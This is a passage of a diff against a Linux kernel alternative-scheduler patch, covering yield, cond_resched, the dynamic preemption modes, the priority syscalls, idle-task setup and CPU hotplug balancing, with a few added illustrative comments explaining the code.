-+
-+	ret = sched_getaffinity(pid, mask);
-+	if (ret == 0) {
-+		unsigned int retlen = min_t(size_t, len, cpumask_size());
-+
-+		if (copy_to_user(user_mask_ptr, mask, retlen))
-+			ret = -EFAULT;
-+		else
-+			ret = retlen;
-+	}
-+	free_cpumask_var(mask);
-+
-+	return ret;
-+}
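-+
-+/*
-+ * Worked example (illustrative, not part of the original patch): on a
-+ * 6-CPU system with 64-bit longs, len must be a multiple of
-+ * sizeof(unsigned long) (8) and len * BITS_PER_BYTE must cover
-+ * nr_cpu_ids, so the smallest valid len is 8. Assuming cpumask_size()
-+ * is also 8, a successful call copies 8 bytes and returns 8, not 0.
-+ */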
-+
-+static void do_sched_yield(void)
-+{
-+	struct rq *rq;
-+	struct rq_flags rf;
-+
-+	if (!sched_yield_type)
-+		return;
-+
-+	rq = this_rq_lock_irq(&rf);
-+
-+	schedstat_inc(rq->yld_count);
-+
-+	if (1 == sched_yield_type) {
-+		if (!rt_task(current))
-+			do_sched_yield_type_1(current, rq);
-+	} else if (2 == sched_yield_type) {
-+		if (rq->nr_running > 1)
-+			rq->skip = current;
-+	}
-+
-+	preempt_disable();
-+	raw_spin_unlock_irq(&rq->lock);
-+	sched_preempt_enable_no_resched();
-+
-+	schedule();
-+}
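-+
-+/*
-+ * Summary (illustrative, not part of the original patch): as the code
-+ * above shows, sched_yield_type selects the yield behaviour: 0 makes
-+ * sched_yield() a no-op, 1 deboosts/requeues a non-RT caller via
-+ * do_sched_yield_type_1(), and 2 marks the caller as rq->skip so the
-+ * next pick passes over it once. With sched_yield_type == 2 and only
-+ * one runnable task, nothing is skipped at all.
-+ */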
-+
-+/**
-+ * sys_sched_yield - yield the current processor to other threads.
-+ *
-+ * This function yields the current CPU to other tasks. If there are no
-+ * other threads running on this CPU then this function will return.
-+ *
-+ * Return: 0.
-+ */
-+SYSCALL_DEFINE0(sched_yield)
-+{
-+	do_sched_yield();
-+	return 0;
-+}
-+
-+#if !defined(CONFIG_PREEMPTION) || defined(CONFIG_PREEMPT_DYNAMIC)
-+int __sched __cond_resched(void)
-+{
-+	if (should_resched(0)) {
-+		preempt_schedule_common();
-+		return 1;
-+	}
-+	/*
-+	 * In preemptible kernels, ->rcu_read_lock_nesting tells the tick
-+	 * whether the current CPU is in an RCU read-side critical section,
-+	 * so the tick can report quiescent states even for CPUs looping
-+	 * in kernel context.  In contrast, in non-preemptible kernels,
-+	 * RCU readers leave no in-memory hints, which means that CPU-bound
-+	 * processes executing in kernel context might never report an
-+	 * RCU quiescent state.  Therefore, the following code causes
-+	 * cond_resched() to report a quiescent state, but only when RCU
-+	 * is in urgent need of one.
-+	 */
-+#ifndef CONFIG_PREEMPT_RCU
-+	rcu_all_qs();
-+#endif
-+	return 0;
-+}
-+EXPORT_SYMBOL(__cond_resched);
-+#endif
-+
-+#ifdef CONFIG_PREEMPT_DYNAMIC
-+#if defined(CONFIG_HAVE_PREEMPT_DYNAMIC_CALL)
-+#define cond_resched_dynamic_enabled	__cond_resched
-+#define cond_resched_dynamic_disabled	((void *)&__static_call_return0)
-+DEFINE_STATIC_CALL_RET0(cond_resched, __cond_resched);
-+EXPORT_STATIC_CALL_TRAMP(cond_resched);
-+
-+#define might_resched_dynamic_enabled	__cond_resched
-+#define might_resched_dynamic_disabled	((void *)&__static_call_return0)
-+DEFINE_STATIC_CALL_RET0(might_resched, __cond_resched);
-+EXPORT_STATIC_CALL_TRAMP(might_resched);
-+#elif defined(CONFIG_HAVE_PREEMPT_DYNAMIC_KEY)
-+static DEFINE_STATIC_KEY_FALSE(sk_dynamic_cond_resched);
-+int __sched dynamic_cond_resched(void)
-+{
-+	if (!static_branch_unlikely(&sk_dynamic_cond_resched))
-+		return 0;
-+	return __cond_resched();
-+}
-+EXPORT_SYMBOL(dynamic_cond_resched);
-+
-+static DEFINE_STATIC_KEY_FALSE(sk_dynamic_might_resched);
-+int __sched dynamic_might_resched(void)
-+{
-+	if (!static_branch_unlikely(&sk_dynamic_might_resched))
-+		return 0;
-+	return __cond_resched();
-+}
-+EXPORT_SYMBOL(dynamic_might_resched);
-+#endif
-+#endif
-+
-+/*
-+ * __cond_resched_lock() - if a reschedule is pending, drop the given lock,
-+ * call schedule, and on return reacquire the lock.
-+ *
-+ * This works OK both with and without CONFIG_PREEMPTION.  We do strange low-level
-+ * operations here to prevent schedule() from being called twice (once via
-+ * spin_unlock(), once by hand).
-+ */
-+int __cond_resched_lock(spinlock_t *lock)
-+{
-+	int resched = should_resched(PREEMPT_LOCK_OFFSET);
-+	int ret = 0;
-+
-+	lockdep_assert_held(lock);
-+
-+	if (spin_needbreak(lock) || resched) {
-+		spin_unlock(lock);
-+		if (!_cond_resched())
-+			cpu_relax();
-+		ret = 1;
-+		spin_lock(lock);
-+	}
-+	return ret;
-+}
-+EXPORT_SYMBOL(__cond_resched_lock);
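-+
-+/*
-+ * Illustrative usage sketch (not part of the original patch): a long
-+ * scan under a spinlock can use the cond_resched_lock() wrapper to
-+ * bound lock hold times, e.g.
-+ *
-+ *	spin_lock(&my_lock);
-+ *	list_for_each_entry(pos, &my_list, node) {
-+ *		process(pos);
-+ *		cond_resched_lock(&my_lock);
-+ *	}
-+ *	spin_unlock(&my_lock);
-+ *
-+ * where my_lock/my_list/process() are hypothetical; the iteration must
-+ * tolerate the lock being dropped and retaken mid-walk.
-+ */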
-+
-+int __cond_resched_rwlock_read(rwlock_t *lock)
-+{
-+	int resched = should_resched(PREEMPT_LOCK_OFFSET);
-+	int ret = 0;
-+
-+	lockdep_assert_held_read(lock);
-+
-+	if (rwlock_needbreak(lock) || resched) {
-+		read_unlock(lock);
-+		if (!_cond_resched())
-+			cpu_relax();
-+		ret = 1;
-+		read_lock(lock);
-+	}
-+	return ret;
-+}
-+EXPORT_SYMBOL(__cond_resched_rwlock_read);
-+
-+int __cond_resched_rwlock_write(rwlock_t *lock)
-+{
-+	int resched = should_resched(PREEMPT_LOCK_OFFSET);
-+	int ret = 0;
-+
-+	lockdep_assert_held_write(lock);
-+
-+	if (rwlock_needbreak(lock) || resched) {
-+		write_unlock(lock);
-+		if (!_cond_resched())
-+			cpu_relax();
-+		ret = 1;
-+		write_lock(lock);
-+	}
-+	return ret;
-+}
-+EXPORT_SYMBOL(__cond_resched_rwlock_write);
-+
-+#ifdef CONFIG_PREEMPT_DYNAMIC
-+
-+#ifdef CONFIG_GENERIC_ENTRY
-+#include <linux/entry-common.h>
-+#endif
-+
-+/*
-+ * SC:cond_resched
-+ * SC:might_resched
-+ * SC:preempt_schedule
-+ * SC:preempt_schedule_notrace
-+ * SC:irqentry_exit_cond_resched
-+ *
-+ *
-+ * NONE:
-+ *   cond_resched               <- __cond_resched
-+ *   might_resched              <- RET0
-+ *   preempt_schedule           <- NOP
-+ *   preempt_schedule_notrace   <- NOP
-+ *   irqentry_exit_cond_resched <- NOP
-+ *
-+ * VOLUNTARY:
-+ *   cond_resched               <- __cond_resched
-+ *   might_resched              <- __cond_resched
-+ *   preempt_schedule           <- NOP
-+ *   preempt_schedule_notrace   <- NOP
-+ *   irqentry_exit_cond_resched <- NOP
-+ *
-+ * FULL:
-+ *   cond_resched               <- RET0
-+ *   might_resched              <- RET0
-+ *   preempt_schedule           <- preempt_schedule
-+ *   preempt_schedule_notrace   <- preempt_schedule_notrace
-+ *   irqentry_exit_cond_resched <- irqentry_exit_cond_resched
-+ */
-+
-+enum {
-+	preempt_dynamic_undefined = -1,
-+	preempt_dynamic_none,
-+	preempt_dynamic_voluntary,
-+	preempt_dynamic_full,
-+};
-+
-+int preempt_dynamic_mode = preempt_dynamic_undefined;
-+
-+int sched_dynamic_mode(const char *str)
-+{
-+	if (!strcmp(str, "none"))
-+		return preempt_dynamic_none;
-+
-+	if (!strcmp(str, "voluntary"))
-+		return preempt_dynamic_voluntary;
-+
-+	if (!strcmp(str, "full"))
-+		return preempt_dynamic_full;
-+
-+	return -EINVAL;
-+}
-+
-+#if defined(CONFIG_HAVE_PREEMPT_DYNAMIC_CALL)
-+#define preempt_dynamic_enable(f)	static_call_update(f, f##_dynamic_enabled)
-+#define preempt_dynamic_disable(f)	static_call_update(f, f##_dynamic_disabled)
-+#elif defined(CONFIG_HAVE_PREEMPT_DYNAMIC_KEY)
-+#define preempt_dynamic_enable(f)	static_key_enable(&sk_dynamic_##f.key)
-+#define preempt_dynamic_disable(f)	static_key_disable(&sk_dynamic_##f.key)
-+#else
-+#error "Unsupported PREEMPT_DYNAMIC mechanism"
-+#endif
-+
-+void sched_dynamic_update(int mode)
-+{
-+	/*
-+	 * Avoid {NONE,VOLUNTARY} -> FULL transitions from ever ending up in
-+	 * the ZERO state, which is invalid.
-+	 */
-+	preempt_dynamic_enable(cond_resched);
-+	preempt_dynamic_enable(might_resched);
-+	preempt_dynamic_enable(preempt_schedule);
-+	preempt_dynamic_enable(preempt_schedule_notrace);
-+	preempt_dynamic_enable(irqentry_exit_cond_resched);
-+
-+	switch (mode) {
-+	case preempt_dynamic_none:
-+		preempt_dynamic_enable(cond_resched);
-+		preempt_dynamic_disable(might_resched);
-+		preempt_dynamic_disable(preempt_schedule);
-+		preempt_dynamic_disable(preempt_schedule_notrace);
-+		preempt_dynamic_disable(irqentry_exit_cond_resched);
-+		pr_info("Dynamic Preempt: none\n");
-+		break;
-+
-+	case preempt_dynamic_voluntary:
-+		preempt_dynamic_enable(cond_resched);
-+		preempt_dynamic_enable(might_resched);
-+		preempt_dynamic_disable(preempt_schedule);
-+		preempt_dynamic_disable(preempt_schedule_notrace);
-+		preempt_dynamic_disable(irqentry_exit_cond_resched);
-+		pr_info("Dynamic Preempt: voluntary\n");
-+		break;
-+
-+	case preempt_dynamic_full:
-+		preempt_dynamic_disable(cond_resched);
-+		preempt_dynamic_disable(might_resched);
-+		preempt_dynamic_enable(preempt_schedule);
-+		preempt_dynamic_enable(preempt_schedule_notrace);
-+		preempt_dynamic_enable(irqentry_exit_cond_resched);
-+		pr_info("Dynamic Preempt: full\n");
-+		break;
-+	}
-+
-+	preempt_dynamic_mode = mode;
-+}
-+
-+static int __init setup_preempt_mode(char *str)
-+{
-+	int mode = sched_dynamic_mode(str);
-+	if (mode < 0) {
-+		pr_warn("Dynamic Preempt: unsupported mode: %s\n", str);
-+		return 0;
-+	}
-+
-+	sched_dynamic_update(mode);
-+	return 1;
-+}
-+__setup("preempt=", setup_preempt_mode);
-+
-+static void __init preempt_dynamic_init(void)
-+{
-+	if (preempt_dynamic_mode == preempt_dynamic_undefined) {
-+		if (IS_ENABLED(CONFIG_PREEMPT_NONE)) {
-+			sched_dynamic_update(preempt_dynamic_none);
-+		} else if (IS_ENABLED(CONFIG_PREEMPT_VOLUNTARY)) {
-+			sched_dynamic_update(preempt_dynamic_voluntary);
-+		} else {
-+			/* Default static call setting, nothing to do */
-+			WARN_ON_ONCE(!IS_ENABLED(CONFIG_PREEMPT));
-+			preempt_dynamic_mode = preempt_dynamic_full;
-+			pr_info("Dynamic Preempt: full\n");
-+		}
-+	}
-+}
-+
-+#define PREEMPT_MODEL_ACCESSOR(mode) \
-+	bool preempt_model_##mode(void)						 \
-+	{									 \
-+		WARN_ON_ONCE(preempt_dynamic_mode == preempt_dynamic_undefined); \
-+		return preempt_dynamic_mode == preempt_dynamic_##mode;		 \
-+	}									 \
-+	EXPORT_SYMBOL_GPL(preempt_model_##mode)
-+
-+PREEMPT_MODEL_ACCESSOR(none);
-+PREEMPT_MODEL_ACCESSOR(voluntary);
-+PREEMPT_MODEL_ACCESSOR(full);
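-+
-+/*
-+ * For illustration (not part of the original patch),
-+ * PREEMPT_MODEL_ACCESSOR(none) above expands to:
-+ *
-+ *	bool preempt_model_none(void)
-+ *	{
-+ *		WARN_ON_ONCE(preempt_dynamic_mode == preempt_dynamic_undefined);
-+ *		return preempt_dynamic_mode == preempt_dynamic_none;
-+ *	}
-+ *	EXPORT_SYMBOL_GPL(preempt_model_none);
-+ */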
-+
-+#else /* !CONFIG_PREEMPT_DYNAMIC */
-+
-+static inline void preempt_dynamic_init(void) { }
-+
-+#endif /* #ifdef CONFIG_PREEMPT_DYNAMIC */
-+
-+/**
-+ * yield - yield the current processor to other threads.
-+ *
-+ * Do not ever use this function, there's a 99% chance you're doing it wrong.
-+ *
-+ * The scheduler is at all times free to pick the calling task as the most
-+ * eligible task to run, if removing the yield() call from your code breaks
-+ * it, it's already broken.
-+ *
-+ * Typical broken usage is:
-+ *
-+ * while (!event)
-+ * 	yield();
-+ *
-+ * where one assumes that yield() will let 'the other' process run that will
-+ * make event true. If the current task is a SCHED_FIFO task that will never
-+ * happen. Never use yield() as a progress guarantee!!
-+ *
-+ * If you want to use yield() to wait for something, use wait_event().
-+ * If you want to use yield() to be 'nice' for others, use cond_resched().
-+ * If you still want to use yield(), do not!
-+ */
-+void __sched yield(void)
-+{
-+	set_current_state(TASK_RUNNING);
-+	do_sched_yield();
-+}
-+EXPORT_SYMBOL(yield);
-+
-+/**
-+ * yield_to - yield the current processor to another thread in
-+ * your thread group, or accelerate that thread toward the
-+ * processor it's on.
-+ * @p: target task
-+ * @preempt: whether task preemption is allowed or not
-+ *
-+ * It's the caller's job to ensure that the target task struct
-+ * can't go away on us before we can do any checks.
-+ *
-+ * In Alt schedule FW, yield_to is not supported.
-+ *
-+ * Return:
-+ *	true (>0) if we indeed boosted the target task.
-+ *	false (0) if we failed to boost the target.
-+ *	-ESRCH if there's no task to yield to.
-+ */
-+int __sched yield_to(struct task_struct *p, bool preempt)
-+{
-+	return 0;
-+}
-+EXPORT_SYMBOL_GPL(yield_to);
-+
-+int io_schedule_prepare(void)
-+{
-+	int old_iowait = current->in_iowait;
-+
-+	current->in_iowait = 1;
-+	blk_flush_plug(current->plug, true);
-+	return old_iowait;
-+}
-+
-+void io_schedule_finish(int token)
-+{
-+	current->in_iowait = token;
-+}
-+
-+/*
-+ * This task is about to go to sleep on IO.  Increment rq->nr_iowait so
-+ * that process accounting knows that this is a task in IO wait state.
-+ *
-+ * But don't do that if it is a deliberate, throttling IO wait (this task
-+ * has set its backing_dev_info: the queue against which it should throttle)
-+ */
-+
-+long __sched io_schedule_timeout(long timeout)
-+{
-+	int token;
-+	long ret;
-+
-+	token = io_schedule_prepare();
-+	ret = schedule_timeout(timeout);
-+	io_schedule_finish(token);
-+
-+	return ret;
-+}
-+EXPORT_SYMBOL(io_schedule_timeout);
-+
-+void __sched io_schedule(void)
-+{
-+	int token;
-+
-+	token = io_schedule_prepare();
-+	schedule();
-+	io_schedule_finish(token);
-+}
-+EXPORT_SYMBOL(io_schedule);
-+
-+/**
-+ * sys_sched_get_priority_max - return maximum RT priority.
-+ * @policy: scheduling class.
-+ *
-+ * Return: On success, this syscall returns the maximum
-+ * rt_priority that can be used by a given scheduling class.
-+ * On failure, a negative error code is returned.
-+ */
-+SYSCALL_DEFINE1(sched_get_priority_max, int, policy)
-+{
-+	int ret = -EINVAL;
-+
-+	switch (policy) {
-+	case SCHED_FIFO:
-+	case SCHED_RR:
-+		ret = MAX_RT_PRIO - 1;
-+		break;
-+	case SCHED_NORMAL:
-+	case SCHED_BATCH:
-+	case SCHED_IDLE:
-+		ret = 0;
-+		break;
-+	}
-+	return ret;
-+}
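-+
-+/*
-+ * Worked example (illustrative, not part of the original patch): with
-+ * MAX_RT_PRIO == 100, sched_get_priority_max(SCHED_FIFO) returns 99
-+ * and sched_get_priority_min(SCHED_FIFO) (below) returns 1, so valid
-+ * RT priorities span [1, 99]; for SCHED_NORMAL both return 0.
-+ */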
-+
-+/**
-+ * sys_sched_get_priority_min - return minimum RT priority.
-+ * @policy: scheduling class.
-+ *
-+ * Return: On success, this syscall returns the minimum
-+ * rt_priority that can be used by a given scheduling class.
-+ * On failure, a negative error code is returned.
-+ */
-+SYSCALL_DEFINE1(sched_get_priority_min, int, policy)
-+{
-+	int ret = -EINVAL;
-+
-+	switch (policy) {
-+	case SCHED_FIFO:
-+	case SCHED_RR:
-+		ret = 1;
-+		break;
-+	case SCHED_NORMAL:
-+	case SCHED_BATCH:
-+	case SCHED_IDLE:
-+		ret = 0;
-+		break;
-+	}
-+	return ret;
-+}
-+
-+static int sched_rr_get_interval(pid_t pid, struct timespec64 *t)
-+{
-+	struct task_struct *p;
-+	int retval;
-+
-+	alt_sched_debug();
-+
-+	if (pid < 0)
-+		return -EINVAL;
-+
-+	retval = -ESRCH;
-+	rcu_read_lock();
-+	p = find_process_by_pid(pid);
-+	if (!p)
-+		goto out_unlock;
-+
-+	retval = security_task_getscheduler(p);
-+	if (retval)
-+		goto out_unlock;
-+	rcu_read_unlock();
-+
-+	*t = ns_to_timespec64(sched_timeslice_ns);
-+	return 0;
-+
-+out_unlock:
-+	rcu_read_unlock();
-+	return retval;
-+}
-+
-+/**
-+ * sys_sched_rr_get_interval - return the default timeslice of a process.
-+ * @pid: pid of the process.
-+ * @interval: userspace pointer to the timeslice value.
-+ *
-+ * Return: On success, 0 and the timeslice is in @interval. Otherwise,
-+ * an error code.
-+ */
-+SYSCALL_DEFINE2(sched_rr_get_interval, pid_t, pid,
-+		struct __kernel_timespec __user *, interval)
-+{
-+	struct timespec64 t;
-+	int retval = sched_rr_get_interval(pid, &t);
-+
-+	if (retval == 0)
-+		retval = put_timespec64(&t, interval);
-+
-+	return retval;
-+}
-+
-+#ifdef CONFIG_COMPAT_32BIT_TIME
-+SYSCALL_DEFINE2(sched_rr_get_interval_time32, pid_t, pid,
-+		struct old_timespec32 __user *, interval)
-+{
-+	struct timespec64 t;
-+	int retval = sched_rr_get_interval(pid, &t);
-+
-+	if (retval == 0)
-+		retval = put_old_timespec32(&t, interval);
-+	return retval;
-+}
-+#endif
-+
-+void sched_show_task(struct task_struct *p)
-+{
-+	unsigned long free = 0;
-+	int ppid;
-+
-+	if (!try_get_task_stack(p))
-+		return;
-+
-+	pr_info("task:%-15.15s state:%c", p->comm, task_state_to_char(p));
-+
-+	if (task_is_running(p))
-+		pr_cont("  running task    ");
-+#ifdef CONFIG_DEBUG_STACK_USAGE
-+	free = stack_not_used(p);
-+#endif
-+	ppid = 0;
-+	rcu_read_lock();
-+	if (pid_alive(p))
-+		ppid = task_pid_nr(rcu_dereference(p->real_parent));
-+	rcu_read_unlock();
-+	pr_cont(" stack:%-5lu pid:%-5d ppid:%-6d flags:0x%08lx\n",
-+		free, task_pid_nr(p), ppid,
-+		read_task_thread_flags(p));
-+
-+	print_worker_info(KERN_INFO, p);
-+	print_stop_info(KERN_INFO, p);
-+	show_stack(p, NULL, KERN_INFO);
-+	put_task_stack(p);
-+}
-+EXPORT_SYMBOL_GPL(sched_show_task);
-+
-+static inline bool
-+state_filter_match(unsigned long state_filter, struct task_struct *p)
-+{
-+	unsigned int state = READ_ONCE(p->__state);
-+
-+	/* no filter, everything matches */
-+	if (!state_filter)
-+		return true;
-+
-+	/* filter, but doesn't match */
-+	if (!(state & state_filter))
-+		return false;
-+
-+	/*
-+	 * When looking for TASK_UNINTERRUPTIBLE skip TASK_IDLE (allows
-+	 * TASK_KILLABLE).
-+	 */
-+	if (state_filter == TASK_UNINTERRUPTIBLE && (state & TASK_NOLOAD))
-+		return false;
-+
-+	return true;
-+}
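-+
-+/*
-+ * Worked example (illustrative, not part of the original patch): with
-+ * state_filter == TASK_UNINTERRUPTIBLE, a task in TASK_IDLE
-+ * (TASK_UNINTERRUPTIBLE | TASK_NOLOAD) passes the bitwise match but is
-+ * then rejected by the TASK_NOLOAD check, while a task in TASK_KILLABLE
-+ * (TASK_WAKEKILL | TASK_UNINTERRUPTIBLE) still matches.
-+ */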
-+
-+void show_state_filter(unsigned int state_filter)
-+{
-+	struct task_struct *g, *p;
-+
-+	rcu_read_lock();
-+	for_each_process_thread(g, p) {
-+		/*
-+		 * Reset the NMI-timeout; listing all tasks on a slow
-+		 * console might take a lot of time:
-+		 * Also, reset softlockup watchdogs on all CPUs, because
-+		 * another CPU might be blocked waiting for us to process
-+		 * an IPI.
-+		 */
-+		touch_nmi_watchdog();
-+		touch_all_softlockup_watchdogs();
-+		if (state_filter_match(state_filter, p))
-+			sched_show_task(p);
-+	}
-+
-+#ifdef CONFIG_SCHED_DEBUG
-+	/* TODO: Alt schedule FW should support this
-+	if (!state_filter)
-+		sysrq_sched_debug_show();
-+	*/
-+#endif
-+	rcu_read_unlock();
-+	/*
-+	 * Only show locks if all tasks are dumped:
-+	 */
-+	if (!state_filter)
-+		debug_show_all_locks();
-+}
-+
-+void dump_cpu_task(int cpu)
-+{
-+	if (cpu == smp_processor_id() && in_hardirq()) {
-+		struct pt_regs *regs;
-+
-+		regs = get_irq_regs();
-+		if (regs) {
-+			show_regs(regs);
-+			return;
-+		}
-+	}
-+
-+	if (trigger_single_cpu_backtrace(cpu))
-+		return;
-+
-+	pr_info("Task dump for CPU %d:\n", cpu);
-+	sched_show_task(cpu_curr(cpu));
-+}
-+
-+/**
-+ * init_idle - set up an idle thread for a given CPU
-+ * @idle: task in question
-+ * @cpu: CPU the idle task belongs to
-+ *
-+ * NOTE: this function does not set the idle thread's NEED_RESCHED
-+ * flag, to make booting more robust.
-+ */
-+void __init init_idle(struct task_struct *idle, int cpu)
-+{
-+	struct rq *rq = cpu_rq(cpu);
-+	unsigned long flags;
-+
-+	__sched_fork(0, idle);
-+
-+	raw_spin_lock_irqsave(&idle->pi_lock, flags);
-+	raw_spin_lock(&rq->lock);
-+
-+	idle->last_ran = rq->clock_task;
-+	idle->__state = TASK_RUNNING;
-+	/*
-+	 * PF_KTHREAD should already be set at this point; regardless, make it
-+	 * look like a proper per-CPU kthread.
-+	 */
-+	idle->flags |= PF_IDLE | PF_KTHREAD | PF_NO_SETAFFINITY;
-+	kthread_set_per_cpu(idle, cpu);
-+
-+	sched_queue_init_idle(&rq->queue, idle);
-+
-+#ifdef CONFIG_SMP
-+	/*
-+	 * It's possible that init_idle() gets called multiple times on a task,
-+	 * in that case do_set_cpus_allowed() will not do the right thing.
-+	 *
-+	 * And since this is boot we can forgo the serialisation.
-+	 */
-+	set_cpus_allowed_common(idle, cpumask_of(cpu));
-+#endif
-+
-+	/* Silence PROVE_RCU */
-+	rcu_read_lock();
-+	__set_task_cpu(idle, cpu);
-+	rcu_read_unlock();
-+
-+	rq->idle = idle;
-+	rcu_assign_pointer(rq->curr, idle);
-+	idle->on_cpu = 1;
-+
-+	raw_spin_unlock(&rq->lock);
-+	raw_spin_unlock_irqrestore(&idle->pi_lock, flags);
-+
-+	/* Set the preempt count _outside_ the spinlocks! */
-+	init_idle_preempt_count(idle, cpu);
-+
-+	ftrace_graph_init_idle_task(idle, cpu);
-+	vtime_init_idle(idle, cpu);
-+#ifdef CONFIG_SMP
-+	sprintf(idle->comm, "%s/%d", INIT_TASK_COMM, cpu);
-+#endif
-+}
-+
-+#ifdef CONFIG_SMP
-+
-+int cpuset_cpumask_can_shrink(const struct cpumask __maybe_unused *cur,
-+			      const struct cpumask __maybe_unused *trial)
-+{
-+	return 1;
-+}
-+
-+int task_can_attach(struct task_struct *p,
-+		    const struct cpumask *cs_effective_cpus)
-+{
-+	int ret = 0;
-+
-+	/*
-+	 * Kthreads which disallow setaffinity shouldn't be moved
-+	 * to a new cpuset; we don't want to change their CPU
-+	 * affinity and isolating such threads by their set of
-+	 * allowed nodes is unnecessary.  Thus, cpusets are not
-+	 * applicable for such threads.  This prevents checking for
-+	 * success of set_cpus_allowed_ptr() on all attached tasks
-+	 * before cpus_mask may be changed.
-+	 */
-+	if (p->flags & PF_NO_SETAFFINITY)
-+		ret = -EINVAL;
-+
-+	return ret;
-+}
-+
-+bool sched_smp_initialized __read_mostly;
-+
-+#ifdef CONFIG_HOTPLUG_CPU
-+/*
-+ * Ensures that the idle task is using init_mm right before its CPU goes
-+ * offline.
-+ */
-+void idle_task_exit(void)
-+{
-+	struct mm_struct *mm = current->active_mm;
-+
-+	BUG_ON(current != this_rq()->idle);
-+
-+	if (mm != &init_mm) {
-+		switch_mm(mm, &init_mm, current);
-+		finish_arch_post_lock_switch();
-+	}
-+
-+	/* finish_cpu(), as run on the BP, will clean up the active_mm state */
-+}
-+
-+static int __balance_push_cpu_stop(void *arg)
-+{
-+	struct task_struct *p = arg;
-+	struct rq *rq = this_rq();
-+	struct rq_flags rf;
-+	int cpu;
-+
-+	raw_spin_lock_irq(&p->pi_lock);
-+	rq_lock(rq, &rf);
-+
-+	update_rq_clock(rq);
-+
-+	if (task_rq(p) == rq && task_on_rq_queued(p)) {
-+		cpu = select_fallback_rq(rq->cpu, p);
-+		rq = __migrate_task(rq, p, cpu);
-+	}
-+
-+	rq_unlock(rq, &rf);
-+	raw_spin_unlock_irq(&p->pi_lock);
-+
-+	put_task_struct(p);
-+
-+	return 0;
-+}
-+
-+static DEFINE_PER_CPU(struct cpu_stop_work, push_work);
-+
-+/*
-+ * This is enabled below SCHED_AP_ACTIVE, i.e. when !cpu_active(), but it is
-+ * only effective while the CPU is going down.
-+ */
-+static void balance_push(struct rq *rq)
-+{
-+	struct task_struct *push_task = rq->curr;
-+
-+	lockdep_assert_held(&rq->lock);
-+
-+	/*
-+	 * Ensure the thing is persistent until balance_push_set(.on = false);
-+	 */
-+	rq->balance_callback = &balance_push_callback;
-+
-+	/*
-+	 * Only active while going offline and when invoked on the outgoing
-+	 * CPU.
-+	 */
-+	if (!cpu_dying(rq->cpu) || rq != this_rq())
-+		return;
-+
-+	/*
-+	 * Both the cpu-hotplug and stop task are in this case and are
-+	 * required to complete the hotplug process.
-+	 */
-+	if (kthread_is_per_cpu(push_task) ||
-+	    is_migration_disabled(push_task)) {
-+
-+		/*
-+		 * If this is the idle task on the outgoing CPU try to wake
-+		 * up the hotplug control thread which might wait for the
-+		 * last task to vanish. The rcuwait_active() check is
-+		 * accurate here because the waiter is pinned on this CPU
-+		 * and obviously can't be running in parallel.
-+		 *
-+		 * On RT kernels this also has to check whether there are
-+		 * pinned and scheduled out tasks on the runqueue. They
-+		 * need to leave the migrate disabled section first.
-+		 */
-+		if (!rq->nr_running && !rq_has_pinned_tasks(rq) &&
-+		    rcuwait_active(&rq->hotplug_wait)) {
-+			raw_spin_unlock(&rq->lock);
-+			rcuwait_wake_up(&rq->hotplug_wait);
-+			raw_spin_lock(&rq->lock);
-+		}
-+		return;
-+	}
-+
-+	get_task_struct(push_task);
-+	/*
-+	 * Temporarily drop rq->lock such that we can wake-up the stop task.
-+	 * Both preemption and IRQs are still disabled.
-+	 */
-+	raw_spin_unlock(&rq->lock);
-+	stop_one_cpu_nowait(rq->cpu, __balance_push_cpu_stop, push_task,
-+			    this_cpu_ptr(&push_work));
-+	/*
-+	 * At this point need_resched() is true and we'll take the loop in
-+	 * schedule(). The next pick is obviously going to be the stop task
-+	 * which kthread_is_per_cpu() and will push this task away.
-+	 */
-+	raw_spin_lock(&rq->lock);
-+}
-+
-+static void balance_push_set(int cpu, bool on)
-+{
-+	struct rq *rq = cpu_rq(cpu);
-+	struct rq_flags rf;
-+
-+	rq_lock_irqsave(rq, &rf);
-+	if (on) {
-+		WARN_ON_ONCE(rq->balance_callback);
-+		rq->balance_callback = &balance_push_callback;
-+	} else if (rq->balance_callback == &balance_push_callback) {
-+		rq->balance_callback = NULL;
-+	}
-+	rq_unlock_irqrestore(rq, &rf);
-+}
-+
-+/*
-+ * Invoked from a CPU's hotplug control thread after the CPU has been marked
-+ * inactive. All tasks which are not per CPU kernel threads are either
-+ * pushed off this CPU now via balance_push() or placed on a different CPU
-+ * during wakeup. Wait until the CPU is quiescent.
-+ */
-+static void balance_hotplug_wait(void)
-+{
-+	struct rq *rq = this_rq();
-+
-+	rcuwait_wait_event(&rq->hotplug_wait,
-+			   rq->nr_running == 1 && !rq_has_pinned_tasks(rq),
-+			   TASK_UNINTERRUPTIBLE);
-+}
-+
-+#else
-+
-+static void balance_push(struct rq *rq)
-+{
-+}
-+
-+static void balance_push_set(int cpu, bool on)
-+{
-+}
-+
-+static inline void balance_hotplug_wait(void)
-+{
-+}
-+#endif /* CONFIG_HOTPLUG_CPU */
-+
-+static void set_rq_offline(struct rq *rq)
-+{
-+	if (rq->online)
-+		rq->online = false;
-+}
-+
-+static void set_rq_online(struct rq *rq)
-+{
-+	if (!rq->online)
-+		rq->online = true;
-+}
-+
-+/*
-+ * used to mark begin/end of suspend/resume:
-+ */
-+static int num_cpus_frozen;
-+
-+/*
-+ * Update cpusets according to cpu_active mask.  If cpusets are
-+ * disabled, cpuset_update_active_cpus() becomes a simple wrapper
-+ * around partition_sched_domains().
-+ *
-+ * If we come here as part of a suspend/resume, don't touch cpusets because we
-+ * want to restore it back to its original state upon resume anyway.
-+ */
-+static void cpuset_cpu_active(void)
-+{
-+	if (cpuhp_tasks_frozen) {
-+		/*
-+		 * num_cpus_frozen tracks how many CPUs are involved in the
-+		 * suspend/resume sequence. As long as this is not the last online
-+		 * operation in the resume sequence, just build a single sched
-+		 * domain, ignoring cpusets.
-+		 */
-+		partition_sched_domains(1, NULL, NULL);
-+		if (--num_cpus_frozen)
-+			return;
-+		/*
-+		 * This is the last CPU online operation. So fall through and
-+		 * restore the original sched domains by considering the
-+		 * cpuset configurations.
-+		 */
-+		cpuset_force_rebuild();
-+	}
-+
-+	cpuset_update_active_cpus();
-+}
-+
-+static int cpuset_cpu_inactive(unsigned int cpu)
-+{
-+	if (!cpuhp_tasks_frozen) {
-+		cpuset_update_active_cpus();
-+	} else {
-+		num_cpus_frozen++;
-+		partition_sched_domains(1, NULL, NULL);
-+	}
-+	return 0;
-+}
-+
-+int sched_cpu_activate(unsigned int cpu)
-+{
-+	struct rq *rq = cpu_rq(cpu);
-+	unsigned long flags;
-+
-+	/*
-+	 * Clear the balance_push callback and prepare to schedule
-+	 * regular tasks.
-+	 */
-+	balance_push_set(cpu, false);
-+
-+#ifdef CONFIG_SCHED_SMT
-+	/*
